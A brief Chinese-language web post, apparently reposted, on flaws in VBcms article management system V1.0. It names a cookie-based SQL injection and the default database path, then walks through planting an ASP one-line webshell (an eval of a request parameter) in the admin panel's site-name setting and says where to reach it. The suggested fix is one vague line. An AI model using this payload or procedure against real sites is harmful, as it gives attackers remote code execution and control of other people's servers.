VBcms文章管理系统V 1.0漏洞及修复 - 网站安全 - 自

Author:mer4en7y

下午遇到这个CMS，于是看了看代码

Check_SqlIn.asp防注入代码未过滤完全注入漏洞：

1）未对cookie方式进行过滤,cookie注入

2）默认数据库： data/article.mdb

3）后台拿shell: 后台地址:admin/login.asp

系统配置-->网站名称处写入："<script language=VBScript runat=server>eval request("1")</script>"

一句话地址:http://www.2cto.com /admin/config.asp

修复：修改默认下载地址，过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11409

更新时间：2022-09-13 阅读：55次